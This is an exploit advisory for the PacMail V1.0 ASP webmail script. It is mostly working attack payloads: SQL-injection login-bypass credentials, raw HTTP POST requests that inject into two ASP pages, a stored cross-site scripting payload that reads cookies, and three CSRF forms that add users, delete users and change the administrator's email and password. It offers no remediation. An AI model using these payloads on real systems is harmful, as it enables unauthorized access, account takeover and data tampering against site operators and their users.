facebook facebook twitter rss

PacMail V1.0 Multiple Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 10-06-2013
PacMail V1.0 Multiple Vulnerabilties
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.vclcomponents.com/ASP/Email_Systems/Pacmail_V_1_0-info.html
####################################################################

===[ Exploit ]===

Auth Bypass:
==============

www.site.com/login.htm

username:'or'a'='a
password:'or'a'='a


Multiple Post Sql injection:
============================

Database:[Ms Access]

POST /m_log.asp HTTP/1.1
Content-Length: 17
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=
Host: www.Site.org.il
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

pwd=1'&uid=1'


POST /users2.asp HTTP/1.1
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=
Host: www.Site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

smail='&B1=Search+Email

Stored Xss:
============
www.site.com/write.asp

write in [Message Body]:

<script>alert(document.cookie)</script>

and Preview NoW!!


Csrf [Add User]:
=================

<form method="POST" name="form0" action="http://site/add.asp">
<input type="hidden" name="email" value="my@hotmail.com"/>
<input type="hidden" name="fname" value="name"/>
<input type="hidden" name="lname" value="family"/>
<input type="hidden" name="B1" value="Add User Here"/>
</form>

</body>
</html>

Csrf [Delete User]:
===================

<form method="POST" name="form0" action="http://site/users3.asp">
<input type="hidden" name="fnameD" value="name"/>
<input type="hidden" name="lnameD" value="family"/>
<input type="hidden" name="emD" value="my@hotmail.com"/>
<input type="hidden" name="B1" value="Delete!"/>
</form>

</body>
</html>

Csrf [Change Email/Password Admin]:
===================================
<form method="POST" name="form0" action="http://site/defaults2.asp">
<input type="hidden" name="passw" value="password"/>
<input type="hidden" name="adminemail" value="admin@hotmail.com"/>
<input type="hidden" name="defaultsig" value="1"/>
<input type="hidden" name="adp" value="1"/>
<input type="hidden" name="ad1" value="1"/>
<input type="hidden" name="ad2" value="1"/>
<input type="hidden" name="ad3" value="1"/>
<input type="hidden" name="remo" value="1"/>
<input type="hidden" name="B1" value="Submit"/>
</form>

</body>
</html>
####################################################################

Like us on Facebook :